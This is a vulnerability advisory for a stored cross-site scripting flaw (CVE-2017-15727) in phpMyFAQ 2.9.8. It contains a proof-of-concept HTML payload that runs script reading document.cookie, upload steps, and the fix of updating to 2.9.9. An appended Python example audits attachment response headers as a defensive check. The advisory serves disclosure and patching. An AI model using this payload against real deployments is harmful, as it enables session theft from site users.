# Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vulnerability
# Date: 28-9-2017
# Exploit Author: Nikhil Mittal (Payatu Labs)
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
# Version: 2.9.8
# Tested on: MAC OS
# CVE : 2017-15727

1. Description
In phpMyFAQ before 2.9.9, there is Stored Cross-site Scripting (XSS) via an HTML attachment.

2. Proof of concept
Exploit code
<!DOCTYPE html><html><head><title>XSS EXPLOIT</title></head><body><script>confirm(document.cookie)</script></body></html>
Steps to reproduce:
1. Create a user having limited access rights to the attachment section
2. Go to http://localhost/phpmyfaq/admin/?action=editentry
3. Upload the exploit code with a .html extension at the place of attachments
4. Access the file URL generated at /phpmyfaq/attachments/<random_path>
5. Reach the last file using directory traversal and the XSS will trigger

3. Solution
Update to phpMyFAQ Version 2.9.9
http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip
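
To verify a deployment after updating, the following added example (not part of the original advisory and not phpMyFAQ code) audits the response headers returned for an uploaded attachment and flags the condition this issue depends on: an HTML attachment rendered inline in the application's origin. The function names, finding codes and sample header sets are assumptions constructed for illustration.

```python
# Added example: audit the response headers served for an uploaded attachment.
# Header names are standard HTTP; the sample responses below are constructed.

# Media types a browser parses as a document that can run script.
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml",
                "text/xml", "application/xml"}


def _sandbox_isolates(csp):
    """True if a CSP sandbox directive blocks script or same-origin access."""
    for directive in csp.split(";"):
        tokens = directive.strip().lower().split()
        if tokens and tokens[0] == "sandbox":
            return not {"allow-scripts", "allow-same-origin"} <= set(tokens[1:])
    return False


def audit_attachment_response(headers):
    """Return finding codes for one attachment response (name -> value dict)."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    media_type = h.get("content-type", "").split(";")[0].strip().lower()
    disposition = h.get("content-disposition", "").split(";")[0].strip().lower()
    nosniff = h.get("x-content-type-options", "").lower() == "nosniff"

    findings = []
    # Without a declared type and without nosniff, the browser may sniff HTML.
    renders_active = media_type in ACTIVE_TYPES or (not media_type and not nosniff)
    forced_download = disposition == "attachment"
    isolated = _sandbox_isolates(h.get("content-security-policy", ""))
    if renders_active and not forced_download and not isolated:
        findings.append("inline-active-content")
    if not nosniff:
        findings.append("missing-nosniff")
    return findings


if __name__ == "__main__":
    samples = {
        "html attachment served as-is": {"Content-Type": "text/html; charset=UTF-8"},
        "forced download": {
            "Content-Type": "application/octet-stream",
            "Content-Disposition": 'attachment; filename="upload.html"',
            "X-Content-Type-Options": "nosniff",
        },
    }
    for name, hdrs in samples.items():
        print(name, "->", audit_attachment_response(hdrs) or "ok")
```

Feed it the headers captured from a request to a test attachment URL; an empty result means the file is downloaded or isolated rather than rendered as a page in the site's origin.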